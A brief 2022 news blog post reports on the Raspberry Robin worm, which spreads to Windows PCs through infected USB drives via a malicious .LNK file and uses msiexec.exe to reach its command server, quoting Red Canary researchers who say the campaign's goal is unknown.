May 26, 2022
New Raspberry Robin Malware Attacks Windows PCs through Infected USB Devices

Cyber Security Experts Find a New Malware Attacking Windows PCs via Infected USB Devices but Don’t Know Why

Cyber security experts have discovered a new malware they call Raspberry Robin, which damages PCs via infected USB devices but don’t know the purpose…

Security researchers have recently uncovered a new form of malware that’s deployed vis-à-vis corrupted USB devices to infect Windows machines. The experts at Red Canary found the worm-like virus spreading offline, and appears to be linked to a “cluster of malicious activity.” However, at this time, not a whole lot is known about this particular threat campaign or its end goals.

New Raspberry Robin Malware Attacks Windows PCs through Infected USB Devices

After security experts analyzed one infected thumb drive, they learned the worm spreads to new devices through a malicious .LNK file. Once a potential victim plugs in the infected USB drive, the malicious code triggers a new process through cmd.exe, and run the file. It also uses Microsoft Standard Installer (msiexec.exe) to reach to its C2 server. Security researchers speculate the server is hosted on a compromised QNAP device, with TOR exit nodes being used as extra C2 infrastructure. Still, it’s endgame isn’t yet known:

“While msiexec.exe downloads and executes legitimate installer packages, adversaries also leverage it to deliver malware. Raspberry Robin uses msiexec.exe to attempt external network communication to a malicious domain for C2 purposes. Absent additional information on later-stage activity, it’s difficult to make inferences on the goal or goals of these campaigns.”

Ashley Lipman

Ashley Lipman is a super-connector with Outreachmama who helps businesses find their audience online through outreach, partnerships, and networking.

View all posts by Ashley Lipman →